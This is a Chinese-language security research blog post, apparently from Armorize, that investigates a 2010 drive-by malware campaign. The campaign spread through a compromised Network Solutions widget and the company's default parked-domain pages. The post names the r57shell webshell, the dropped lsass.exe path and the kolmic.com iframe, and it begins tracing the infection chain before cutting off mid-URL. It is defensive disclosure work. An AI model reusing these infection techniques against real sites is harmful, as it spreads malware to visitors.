href="http://3.bp.blogspot.com/_hELDi5B8zOI/TGRS08zFZHI/AAAAAAAACEs/q0Zwyn43kTg/s1600/widgetbox_malware_1_1.png"><img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 748px; DISPLAY: block; CURSOR: hand" id="BLOGGER_PHOTO_ID_5504615714180654194" border="0" alt="" src="http://3.bp.blogspot.com/_hELDi5B8zOI/TGRS08zFZHI/AAAAAAAACEs/q0Zwyn43kTg/s1600/widgetbox_malware_1_1.png" /></a>Screenshot 1</center><br />事情起因於約三個星期前,那時我們正吃力的準備今年美國駭客年會Black Hat 與 DEF CON 的演講。我們的客戶之一,<a href="http://www.itis.tw/node/3910">賽門鐵克VeriSign部門</a>(<a href="https://blogs.verisign.com/ssl-blog/2010/08/network_solutions_malcode_widg.php">HackAlert負責幫他們所有擁有「VeriSign Trusted簽章」的客戶定期掃瞄掛馬</a>),不斷地質疑我們,為何HackAlert一直將某些網域認定為「即時惡意網域」,導致這些網域因為VeriSign Trusted簽章被取消,而不斷地聯絡客服。所謂「即時惡意網域」,就是現行犯--當天正在散播有感染力的(會真的"work"的掛馬)。最後我們研究報告公開後,VeriSign 也主動<a href="https://blogs.verisign.com/ssl-blog/2010/08/network_solutions_malcode_widg.php">發表 blog 說明</a>,該事件起因乃 VeriSign 收到客戶反應被 VeriSign 標為惡意網頁而取消 VeriSign Trusted 簽章,但是防毒軟體卻沒有叫,因此懷疑 VeriSign 之檢測結果為誤報,此 case 才由 VeriSign 轉交阿碼處理。VeriSign目前使用HackAlert幫所有的簽章用戶掃瞄掛馬,由於規模大,預期將有助於VeriSign對掛馬威脅與趨勢之瞭解。<br /><br /><b><a name="part2">第二部--Widget被掛馬,五千多網站遭殃</a></b><br /><br />第一次被VeriSign質疑時,當時大家都被Black Hat / DEF CON 要給的三場演講操翻了,只能很快的確定這些網頁確實都有掛馬,並具有感染力,然後將含有traceback(網頁A iframe 網頁B,網頁B javascript src 網頁C...一路下去最後掛馬放在網頁F這樣)的log寄給對方,「保證」沒有誣賴這些網域。<br /><br />可是過沒多久又持續收到 VeriSignb 的質疑,因為當事的客戶質疑他們,而這些被我們標出的網域,並沒有被 Google 列為黑名單,他們用了一些防毒軟體的黑名單查,也沒有,因此強烈懷疑被 HackAlert 誤報,希望我們可以提供詳細的調查報告。我們記得當時我們在Black Hat演講結束,回答完問題後,還趕快到講師休息室上網,一方面回VeriSign的email並信心喊話--大家要相信我們--一方面也趁掛馬還在,趕快寫調查報告。<br /><br />人工的調查開始後,我們很快的注意到了,感染的原因是因為網頁安裝了一個Network Solutions所提供的,名叫 "<a href="http://growsmartbusiness.com/badges/">Small Business Success Index</a>" 的Widget。這個Widget可以透過至少兩種方式來安裝到某個網頁或部落格中--透過<a href="http://www.widgetbox.com/widget/small-business-success-index">WidgetBox所提供的 one-click 方式安裝</a> (<b>如上圖Screenshot 1</b>),或者直接到 Network Solutions 的 <a href="http://www.widgetbox.com/widget/small-business-success-index">growsmartbusiness.com</a> 的網站進行安裝(<b>如下圖Screenshot 2</b>)。<br /><center><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_hELDi5B8zOI/TGRW-AvXlAI/AAAAAAAACE0/S_soIaqrVXs/s1600/widgetbox_5_1024.png"><img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 748px; DISPLAY: block; CURSOR: hand" id="BLOGGER_PHOTO_ID_5504620267904144386" border="0" alt="" src="http://2.bp.blogspot.com/_hELDi5B8zOI/TGRW-AvXlAI/AAAAAAAACE0/S_soIaqrVXs/s1600/widgetbox_5_1024.png" /></a>Screenshot 2</center><br />我們很快地註冊一個Blogger的部落格帳號,然後透過WidgetBox安裝了這個Widget。就這樣,這個新的部落格立刻開始供應掛馬了。安裝該widget的方式不限於透過WidgetBox,而在那時,WidgetBox上已記錄了有 5,371個網站已經安裝了這個widget了(<b>見 Screenshot 1</b>)。也就是說,可能有超過五千個網站,這陣子都在散播掛馬。Hmm...<br /><br />下面是我們驗証過程的幾個步驟。 首先我們先到 Widgetbox然後點擊"Install Widget"的按鈕(<b>圖Screenshot 3</b>),就會看到一個內含javascript的彈跳式視窗出現,按下"one-click-install"按鈕來安裝到<b>Facebook, Blogger, Twitter, iGoogle, WordPress, LinkedIn, my Yearbook 等等</b>。<br /><center><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_hELDi5B8zOI/TGRRYbDTqEI/AAAAAAAACEM/cVckEvj-Qlk/s1600/widgetbox_malware_2.png"><img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; DISPLAY: block; CURSOR: hand" id="BLOGGER_PHOTO_ID_5504614124573927490" border="0" alt="" src="http://3.bp.blogspot.com/_hELDi5B8zOI/TGRRYbDTqEI/AAAAAAAACEM/cVckEvj-Qlk/s1600/widgetbox_malware_2.png" /></a>Screenshot 3</center><br />在我們點選"Blogger"後,它有了動作--我們的<a href="http://armorizetest.blogspot.com/">armorizetest</a>部落格現在已安裝好這個widget了:<br /><center><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_hELDi5B8zOI/TGRalVvxduI/AAAAAAAACE8/75OHIvH8F-I/s1600/widgetbox_malware_3_1.png"><img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 748px; DISPLAY: block; CURSOR: hand" id="BLOGGER_PHOTO_ID_5504624242092766946" border="0" alt="" src="http://1.bp.blogspot.com/_hELDi5B8zOI/TGRalVvxduI/AAAAAAAACE8/75OHIvH8F-I/s1600/widgetbox_malware_3_1.png" /></a>Screenshot 4</center><br />點擊"Edit"會秀出這個widget的javascript的原始碼--它是從<b>cdn.widgetserver.com</b>這裡被載入的:<br /><center><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_hELDi5B8zOI/TGRc1_hnWaI/AAAAAAAACFE/Kp0nqXVQBk4/s1600/widgetbox_6.png"><img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; DISPLAY: block; CURSOR: hand" id="BLOGGER_PHOTO_ID_5504626727208835490" border="0" alt="" src="http://1.bp.blogspot.com/_hELDi5B8zOI/TGRc1_hnWaI/AAAAAAAACFE/Kp0nqXVQBk4/s1600/widgetbox_6.png" /></a>Screenshot 5</center><br />重新載入我們這個測試的部落格,現在我們可看到這個widget了:<br /><center><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_hELDi5B8zOI/TGRRZRLSqpI/AAAAAAAACEc/uXdDJwwdxww/s1600/widgetbox_malware_4.png"><img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 748px; DISPLAY: block; CURSOR: hand" id="BLOGGER_PHOTO_ID_5504614139102931602" border="0" alt="" src="http://2.bp.blogspot.com/_hELDi5B8zOI/TGRRZRLSqpI/AAAAAAAACEc/uXdDJwwdxww/s1600/widgetbox_malware_4.png" /></a>Screenshot 6</center><br />這個可憐的測試的部落格現在已正式成為惡意網站了。使用HackAlert來掃瞄它,發現這個部落格確實已開始在供應惡意程式了,掛馬的路徑我們於<a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=4729576458237352742#part6">第六部</a>中說明。<br /><br /><b>初步結論:真是一個一個能快速讓你的網頁或部落格通通變成掛馬網站的好方法。</b><br /><br />稍微Google了一下,我們証實了growsmallbusiness.com這個網站的確被入侵了,而且被安裝了名為r57shell (webshell)的後門,可以讓攻擊者輕鬆地來修改任何檔案並控制這個網站。可以看一下<a href="http://webcache.googleusercontent.com/search?q=cache:xBysOx9rGNMJ:growsmartbusiness.com/tag/microsoft/+http://growsmartbusiness.com/widgets/widget.php&cd=7&hl=ru&ct=clnk&gl=tw&client=firefox-a">這個連結</a>.<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_hELDi5B8zOI/TGRtgap8ebI/AAAAAAAACFM/WY5jqm-dMbA/s1600/widgetbox_malware_5.png"><img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 748px; DISPLAY: block; CURSOR: hand" id="BLOGGER_PHOTO_ID_5504645048232081842" border="0" alt="" src="http://4.bp.blogspot.com/_hELDi5B8zOI/TGRtgap8ebI/AAAAAAAACFM/WY5jqm-dMbA/s1600/widgetbox_malware_5.png" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_hELDi5B8zOI/TGRtgnOsdAI/AAAAAAAACFU/ime4XQqdGrM/s1600/widgetbox_malware_6.png"><img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 748px; DISPLAY: block; CURSOR: hand" id="BLOGGER_PHOTO_ID_5504645051607446530" border="0" alt="" src="http://1.bp.blogspot.com/_hELDi5B8zOI/TGRtgnOsdAI/AAAAAAAACFU/ime4XQqdGrM/s1600/widgetbox_malware_6.png" /></a><br /><span class="fullpost"><br /><b><a name="part3">第三部--大規模寄放網域掛馬,影響五十萬至五百萬網域</a></b><br /><br />確定 Network Solutions 的widget被感染後,我們意識到了一點:在五月時,我們曾經貼出文章,描述 <a href="http://blog.armorize.com/2010/05/beware-of-boingboingcom-malware.html">boingboing.com寄放網域(parked domain)</a>的掛馬事件。由於該網域名稱長得像大站boingboing.net,所以當時HackAlert爬到該網頁的掛馬時,我們就請同事分析並寫了一篇blog。這是我們注意到,那時這個寄放網域的掛馬,跟現在是一模一樣的,都是因為上面放了這個 widget,所以才不斷地在散播掛馬。<br /><br />結果我們花了一些時間研究後,驚訝地發現,不得了,事情嚴重了--該widget被用於 Network Solutions 的預設寄放網域的頁面中。也就是說,只要是跟 Network Solutions 所註冊的網域,如果選擇了用預設的寄放網域,就立刻成為了惡意網站!<br /><br />此時,為了確保我們的認定是對的,我們也用Network Solutions註冊了一個網域 <a href="http://www.armorizetest.com/">armorizetest.com</a>並且驗證它的確會供應惡意程式,以下是我們所做的:<br /><br />首先我們向 Network Solutions 購買了一個網域:<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_hELDi5B8zOI/TGcD6Ul19iI/AAAAAAAACGE/rtOLDwi8Ghs/s1600/network_solutions_malware_domain_configure1.png"><img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 748px; DISPLAY: block; CURSOR: hand" id="BLOGGER_PHOTO_ID_5505373369978451490" border="0" alt="" src="http://4.bp.blogspot.com/_hELDi5B8zOI/TGcD6Ul19iI/AAAAAAAACGE/rtOLDwi8Ghs/s1600/network_solutions_malware_domain_configure1.png" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_hELDi5B8zOI/TGcD6jk4KtI/AAAAAAAACGM/IPIe_IMBUWU/s1600/network_solutions_malware_domain_registration.png"><img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 748px; DISPLAY: block; CURSOR: hand" id="BLOGGER_PHOTO_ID_5505373374000933586" border="0" alt="" src="http://4.bp.blogspot.com/_hELDi5B8zOI/TGcD6jk4KtI/AAAAAAAACGM/IPIe_IMBUWU/s1600/network_solutions_malware_domain_registration.png" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_hELDi5B8zOI/TGcD6NFbtVI/AAAAAAAACF8/459DV20rOEg/s1600/network_solutions_malware_domain_registration2-1.png"><img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 748px; DISPLAY: block; CURSOR: hand" id="BLOGGER_PHOTO_ID_5505373367963465042" border="0" alt="" src="http://1.bp.blogspot.com/_hELDi5B8zOI/TGcD6NFbtVI/AAAAAAAACF8/459DV20rOEg/s1600/network_solutions_malware_domain_registration2-1.png" /></a><br />然後我們使用它標準的"under construction page"來寄放:<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_hELDi5B8zOI/TGcD7JJFUqI/AAAAAAAACGU/GH57ADzDgz4/s1600/network_solutions_malware_domain_configure2.png"><img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 748px; DISPLAY: block; CURSOR: hand" id="BLOGGER_PHOTO_ID_5505373384084902562" border="0" alt="" src="http://3.bp.blogspot.com/_hELDi5B8zOI/TGcD7JJFUqI/AAAAAAAACGU/GH57ADzDgz4/s1600/network_solutions_malware_domain_configure2.png" /></a><br />完成了,我們現在連線到我們剛買的寄放網域,可以看到被掛馬的(惡意)Network Solutions widget。分析一下它資料流,是的,它也開始供應惡意網頁掛馬了,跟我們先前所分析到的一致。<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_hELDi5B8zOI/TGcD7pJqY3I/AAAAAAAACGc/qmNQRSrfzrU/s1600/network_solutions_malware_domain_armorize_malware2-1.png"><img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 748px; DISPLAY: block; CURSOR: hand" id="BLOGGER_PHOTO_ID_5505373392677266290" border="0" alt="" src="http://2.bp.blogspot.com/_hELDi5B8zOI/TGcD7pJqY3I/AAAAAAAACGc/qmNQRSrfzrU/s1600/network_solutions_malware_domain_armorize_malware2-1.png" /></a><br />在瀏覽過這個網頁後,主機會被安裝一個惡意程式在:<b>C:\Documents and Settings\Administrator\Application Data\SystemProc\lsass.exe</b>,這個<b>SystemProc</b>目錄為一個隱藏目錄。<br /><br />而這個lsass.exe檔案被<a href="http://www.virustotal.com/file-scan/report.html?id=391b9d455a30d8b8bb3a4899b10891d831277471711a9878fe89d130edf25f71-1281671967">VirusTotal中的42家掃毒軟體掃瞄過後,有21家偵測為惡意</a>。<br /><br />我們在這邊準備了一個影片,可以看到整個感染的過程:<br /><object width="480" height="385"><param name="movie" value="http://www.youtube.com/v/qWLX0a3FS_Y?fs=1&hl=zh_TW"><param name="allowFullScreen" value="true"><param name="allowscriptaccess" value="always"><embed src="http://www.youtube.com/v/qWLX0a3FS_Y?fs=1&hl=zh_TW" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"></embed></object><br /><br /><b><a name="part4">第四部--威脅影響範圍</a></b><br /><br />之前並沒有這方面的研究,因此此次算是新型的大規模掛馬攻擊。此次事件的重點是,到底有多少個<b>寄放網域</b>正受到影響,而且在供應惡意程式呢?<br /><b><a href="http://www.google.com/#q=%22this+page+is+under+construction%22+%22how+to+get+online%22&hl=en&filter=0&fp=8631cdd35a4d476d">根據Google,至少超過五十萬個</a>:</b><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_hELDi5B8zOI/TGbpd43kWsI/AAAAAAAACFs/6VQHSLldkwo/s1600/google_network_solutions_malware_parked_domains2.png"><img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 748px; DISPLAY: block; CURSOR: hand" id="BLOGGER_PHOTO_ID_5505344294197942978" border="0" alt="" src="http://4.bp.blogspot.com/_hELDi5B8zOI/TGbpd43kWsI/AAAAAAAACFs/6VQHSLldkwo/s1600/google_network_solutions_malware_parked_domains2.png" /></a><br /><a href="http://search.yahoo.com/search;_ylt=A0oGdHFKa2dMN48A18JXNyoA;_ylc=X1MDMjc2NjY3OQRfcgMyBGFvAzAEZnIDeWZwLXQtNzAxBGhvc3RwdmlkA1Z1SWNUa29HZEl4N2pYWWJUR0N2YlFSVGdQRmJKMHhuYTBvQUR6Zy4Ebl9ncHMDMARuX3ZwcwMwBG9yaWdpbgNzcnAEcXVlcnkDInRoaXMgcGFnZSBpcyB1bmRlciBjb25zdHJ1Y3Rpb24iICJTZXJ2aWNlIEFncmVlbWVudCIgIlRyYWRlbWFyayBGcmVlIFpvbmUiBHNhbwMxBHZ0ZXN0aWQDSDQ2NQ--?p=%22this+page+is+under+construction%22+%22Service+Agreement%22+%22Trademark+Free+Zone%22&fr2=sb-top&fr=yfp-t-701">根據Yahoo</a>,多了一個零,至少有五百萬個網域:<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_hELDi5B8zOI/TGdsmIr_Y_I/AAAAAAAACG0/4sYXNX2FRJg/s1600/network_solutions_malware_yahoo_search.png"><img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; DISPLAY: block; CURSOR: hand" id="BLOGGER_PHOTO_ID_5505488471906542578" border="0" alt="" src="http://1.bp.blogspot.com/_hELDi5B8zOI/TGdsmIr_Y_I/AAAAAAAACG0/4sYXNX2FRJg/s1600/network_solutions_malware_yahoo_search.png" /></a><br />我沒有時間來一個一個點,但是我們點了足夠的連結,足以證明他們真的同樣受到了感染,而且Google或Yahoo也確實的秀出所有的結果。Google只有列出前面45頁,而Yahoo也只會列出前100頁。所以我們無法真的看到所有每一個上面所列的網域,而要來手動驗證的話,五百萬個實在是一個很大的數目。<br /><br />之後 Network Solutions 公開數據,宣稱只有十二萬寄放網域被感染。這部分我們覺得不可能,因為怎麼算都不對。Yahoo查出來寄放網域有五百萬筆,假設只有一百萬好了,那麼這一百萬之中,假設真的只有十二萬筆被感染,那麼我們在搜尋結果中,隨機的點一個結果,而該網域有包含該widget的機率,是120,000*100/1,000,000 = 12%,可是從我們的錄影中可以看出,我們雖機點了那麼多個,命中率百分之百。另一方面,我們也不太相信,他們的預設的parking網頁,會有那麼多版本,因為事實上我們根據查出來的結果,點來點去,每個網頁都一樣,也都有那個被感染的widget。<br /><br />不過,不論數目多大,重點倒不是數目,而是流量--這些網葉加起來有多少流量?這個議題就牽扯到了一個很敏感的話題:域名搶註與寄放網域的商業模式(parked domain monetization)--可以參考<a href="http://en.wikipedia.org/wiki/Domain_parking">Wikipedia的定義</a>。Wikipedia上面引述了<a href="http://icannwiki.org/index.php/Parked_Domain_Monetization">ICANNWiki的數據,來說明這種商業模式的市場規模:</a><br /><br />「<br />根據2005年11月7日<a href="http://online.wsj.com/public/article/SB113200310765396752-FYV6dsilRS0N1fsiVu_bLf_5nI8_20061116.html?mod=rss_free">華爾街日報報導</a>,"寄放網域的線上廣告營收,今年達6億美元,2007年將達10億美元。"<br />」<br /><br />這需到多大的流量?<b>很大</b><br /><br />此外,網域註冊商似乎也靠此產生可觀的收入,<a href="http://www.circleid.com/posts/the_parked_domain_monetization_business/">CircleID報導</a>:"根據Afilias公司的Ram Mohan,前五大網域商中,有三家證實一年可靠寄放網域上的廣告產生五百至八百萬美金的營收。"<br /><br />無論如何,這種商業模式的合法性一直是廣受爭議的(<a href="http://www.circleid.com/posts/parked_domains_google_adnonsense/">譬如這裡</a>),甚至對於搜尋引擎是否應該在結果中列出寄放網域,也是一樣。有趣的是,就在我們公布Yahoo搜尋畫面後幾天,Yahoo就改了搜尋機制。現在,如果用同樣的<a href="http://search.yahoo.com/search;_ylt=?p=%22this+page+is+under+construction%22+%22Service+Agreement%22+%22Trademark+Free+Zone%22&fr2=sb-top&fr=yfp-t-701">關鍵字搜尋Yahoo</a>,只有六筆結果。這表示幾天內,Yahoo改了搜尋機制,使得寄放網域,盡量不出現在搜尋結果當中。<br /><br />在當初的英文部落格中,我們接下來寫到:「如果我們要抵制這種商業模式(我們要嗎?我們該嗎?),那麼搜尋引擎不在結果中列出寄放網域,是絕對會有幫助的。」<br /><br />由於此次的研究立刻被全球媒體不斷地報導,我們在某報導的留言中,發現的一篇非常有趣的留言(Jason留):<br /><br />==========================================================<br />Disclosure: I'm a domainer. Let me shed some light on some misrepresentations here in your article. 1. Parked domains can often have a lot of traffic. Thousands a day quite often. One man alone, Frank Schilling, sends about 26 million uniques a month to Yahoo. Think about that for a second. 2. Search engines stopped indexing parked domains about three years ago. Armorize did not study the market very well it seems. Yes...you will find an occasional parked domain in the search engine idexes, but believe me Google, Yahoo, and MSN have done everything they can to remove parked domains from the search engines. 3. Parked domains don\'t need search engine traffic. If you cut off search engine traffic 100% to a domainer like me it would afftect me very little. In fact, search engine referrals make up less than 4% of my total traffic. My traffic comes from \"direct navigation\" or \"direct search\" as some call it. Folks just type in the domains into there address bar since I own high quality generic domains. Just like folks will type in Sex.com into their browsers they will also type other less popular domains into the address bar as well......domains like CatFood.com, RoofShingles.com, CarTires.com, etc.... all have traffic with NO search engine referrals. 4. Why would anyone suggest something like attacking Domainers by \"cutting off their revenue stream\". What the heck did we do? We had nothing to do with the malware!!! Why attack us? How misguided. That is like attacking a landlord b/c his tenants smoke marijuana. Very, very silly idea and would cause lawsuits. This is a very big industry, it\'s just that most folks just don\'t know it exists. 5. Calling sites that are developed \"legitimate domains\" means you are saying that domains that are parked are illegitimate. ICANN is getting ready to put into their new rules for registars and the UDRP that doamin parking is legitmate. Domain selling is legitimate, and much more verbage to address those that have attacked Domainers and domain parking. Domain parking is legitimate folks. Please don\'t tell us it is not, or we are not, when legally it is 100% legal and has never been illegal/illegitimate. Please get your facts straight people b/c I am offended to be painted in a negative light after having been a domainer since August 1995.....before the term even existed. Thanks!<br />=========================================================<br /><br />我們結錄部分:「我是一位域名家,我這邊澄清一些事情。1. 寄放網域往往可已有很大的流量,一天常能到幾千(page views)。<a href="http://en.wikipedia.org/wiki/Frank_Schilling">Frank Schilling</a>(域名家,估計擁有的網域總價值五億美金)一個人一個月可以產生兩千六百萬次的獨立瀏覽。2. 搜尋引擎三年前就不索引寄放網域了。阿碼似乎不清楚這點。對,有時你可以藉由搜尋引擎查到寄放網域,可是相信我,Google、Yahoo、以及MSN都非常盡力地不讓寄放網域出現於他們的搜尋結果中。...」<br /><br />當然Jason對我們有些誤會,主要是他將記者的文章當成我們講的,不過重點是,從他給該文章的留言中我們可以推論兩點:<br /><br />A)寄放網域的確可以有可觀的流量!<br />B)我們透過搜尋引擎查出的 Network Solutions 寄放網域數,可能還是偏低的。<br /><br />我們可以實際根據Network Solutions上的一個計數器,來實際瞭解,這些寄放網域加起來,究竟可以產生多少流量。<br /><br />Network Solutions的標準寄放網頁,會對於來自台灣以及香港的IP,丟一個script,而這個script最後,會包含<a href="http://www.51.la/report/1_main.asp?id=3542139">一個51.la的計數器</a>。我們抓了一些畫面。第一,這個 script 只會被丟給來自台灣以及香港的IP,因此我們可以看到,大部分的流量也就來自台灣或香港。其中來自其他地方的,是因為該 script 與 51.la 所用的IP資料庫不一樣,因此有些被該script認定為來自台灣或香港的IP,51.la則認為來自其他地區。<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_hELDi5B8zOI/TGypT2eXH3I/AAAAAAAACHQ/ALX5cbqEI8Y/s1600/traffic2.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 748px" src="http://1.bp.blogspot.com/_hELDi5B8zOI/TGypT2eXH3I/AAAAAAAACHQ/ALX5cbqEI8Y/s1600/traffic2.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5506962602872741746" /></a><br />那麼一天能有多少page views呢?我們來看一下,不過這邊注意到,該 script 不止 Network Solutions 的寄放網域上有,而是很多 hosting 公司的標準寄放網頁上都有。所以該計數器所記錄的,是多家寄放網域,來自台灣與香港流量的總和。<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_hELDi5B8zOI/TGy4XTgatiI/AAAAAAAACHY/4tirUtUDS6s/s1600/google_network_solutions_malware_parked_domains_51la2.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://2.bp.blogspot.com/_hELDi5B8zOI/TGy4XTgatiI/AAAAAAAACHY/4tirUtUDS6s/s1600/google_network_solutions_malware_parked_domains_51la2.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5506979154880017954" /></a><br />根據這個計數器,一天平均有14,073個page view。我們可以算一下,根據InternetWorldStats.com,台灣與香港的網路人口,<a href="http://www.internetworldstats.com/stats3.htm#asia">各佔亞洲的 2% 與 0.6% </a>,所以加起來是 2.6%。<a href="http://www.internetworldstats.com/stats.htm">亞洲則佔全球的 42%</a>,也就是說,台灣與香港佔全球的2.6% * 42% = 1.1% 。<br /><br />那麼,平均一天 14,073 次,除以 1.1%,就是平均一天 1,279,363 次 page views:超過一百萬!也就是說,這個計數器所統計的寄放網域流量總和,一天可能有超過一百次的瀏覽量。<br /><br /><b>這邊很有價值的觀察是,這些看似微不足道的個別寄放網域流量,當數量龐大,加總起來時,卻產生的龐大的流量。</b>我們可以看到以下referer排行,除了前兩名寄放網域每天有三位數的流量外,前十名大部分都是個位數的。<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_hELDi5B8zOI/TGzBHZ6aiLI/AAAAAAAACHg/No4KRmURMJI/s1600/traffic4.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 748px" src="http://2.bp.blogspot.com/_hELDi5B8zOI/TGzBHZ6aiLI/AAAAAAAACHg/No4KRmURMJI/s1600/traffic4.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5506988777326414002" /></a><br /><br />一天超過一百萬次的瀏覽,假設 Network Solutions 佔 1/10 就好,那也是一天十萬次的流量,訪問的有掛馬的寄放網頁。<b>更值得注意的是,這種威脅,因為不容易被注意到,所以尾巴很長。</b>我們於五月時就已經寫 blog 說明我們於 boingbonig.com 上<a href="http://blog.armorize.com/2010/05/beware-of-boingboingcom-malware.html">找到的掛馬</a>,所以 Network Solutions 上的這隻掛馬,至少已經從五月活到現在了。可是根據 Slashdot 使用者針對我們 blog 的留言討論,很可能從去年七月,Network Solutions 的標準寄放網頁,就已經被掛馬了!如果是這樣,那麼這個掛馬除了流量大,時間又長,造成的威脅十分嚴重。<br />==== noc007 說 ===========<br />"I thought this was a known fact Network Solutions' parked pages served malware in one form or another. Back in July of last year I got some questions from an executive why the domain the company recently registered for was being blocked by the corporate web content filter. Turns out the Network Solutions parked page had an iframe that was serving malware from kolmic.com. I explained it and provided the parked page's html code with the offending code highlighted.<br /><br />Doing some Google searches showed that I wasn't the only one that had noticed this."<br />===============<br /><br />Followed by :<br />==== The-Blue_Clown 說 ===========<br />"I had the same exact experience. The only issue was I had an exec that wasn't going to be pushed around by the IT guys. She ordered the filter relaxed. I only got my way when i told her i needed all such requests in writing as she was assuming the known risk i had just finished explaining to her."<br />===============<br /><br /><b><a name="part5">第五部--威脅討論</a></b><br /><br />同為大規模掛馬威脅,此種威脅有別於一般常見的大規模 SQL Injection 掛馬攻擊,譬如八月17日剛發生的,<a href="http://www.blogger.com/=%22http://www.theregister.co.uk/2010/08/17/apple_sql_attack/%22">打到了 apple.com 的大規模 SQL Injection掛馬攻擊</a>。大規模 SQL Injection 掛馬,打的範圍不容易掌握,所以常常很快曝光。感染到大型網站如 apple.com,雖然流量大,可是對方處理得也相對快,常常一天內就被清除了。相較起來,此次我們研究的大規模寄放網域掛馬,除了流量大,重點是,可以活很久,因次累積下來所造成的威脅,十分可觀。<br /><br />所以這次我們觀察到的有以下幾點:<br /><b><br />1. 寄放網域有可觀的流量。<br />2. 尤其數量龐大的寄放網域,所產生的總流量,十分可觀。<br />3. 相較常見的大規模 SQL Injection 掛馬攻擊,此種威脅由於存活期長,因此累積流量可觀,造成的受害者也相對地多。<br />4. 相較常見的大規模 SQL Injection 掛馬攻擊,此種威脅同為大規模,但是攻擊者所擁有的控制能力高很多。由於擁有 webshell,攻擊者可以隨時決定何時安插掛馬,何時除去掛馬等等。<br />5. 感染途徑可以是這次的透過 widget 的感染,也可以是直接入侵 hosting 的平台,或經由惡意廣告(malvertising)等方式。<br /><br />另一觀察是,當你上了 apple.com 而你的防毒軟體發出警告,你很可能立刻花時間瞭解,是否 apple.com 被掛馬了?可是當你不小心去了一個寄放網域,而你的防毒叫了,你研究的動力大為不同--反正是寄放網域嘛!這可能也是為何此次威脅存活了這麼久的原因之一。<br /></b><br /><br /><b><a name="part6">第六部--掛馬 exploit 與惡意程式分析</a></b><br /><br />A. 掛馬路徑如下:<br /><br />1. in http://armorizetest.blogspot.com,<br /><pre class="brush: js;"><br /><script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js"></script><script type="text/javascript">if (WIDGETBOX) WIDGETBOX.renderWidget('68804a4e-6a5a-444c-b0d7-efdced64bee1');</script><br /></pre><br />2. http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js,<br /><pre class="brush: js;"><br />if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"39866",urls:{runtimeBaseUrl:"http://widgetserver.com/syndication",...,markupRuntimeBaseUrl:"http://markup.widgetserver.com/syndication",...},<br /></pre><br />3. http://cdn.widgetserver.com/syndication/subscriber/Main.js?39866, code omitted<br /><br />4. http://markup.widgetserver.com/syndication/get_widget.html?widget.appId=68804a4e-6a5a-444c-b0d7-efdced64bee1&widget.regId=390f0daf-4998-474c-b207-a6398f278681&widget.friendlyId=small-business-success-index&widget.name=Small%20Business%20Success%20Index&widget.token=0ed26d5a93c23a4c798d563608b7265d07481df40000012a67400851&widget.sid=2bf65a16514f760acc18c69a3420ad34&widget.vid=2bf65a16514f760acc18c69a3420ad34&widget.id=0&widget.location=http%3A%2F%2Farmorizetest.blogspot.com%2F&widget.timestamp=1281647662457&widget.serviceLevel=0&widget.provServiceLevel=1&widget.instServiceLevel=0&widget.width=160&widget.height=300&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.ua=mozilla%2F4.0%20%28compatible%3B%20msie%206.0%3B%20windows%20nt%205.1%3B%20sv1%29&widget.output=htmlconte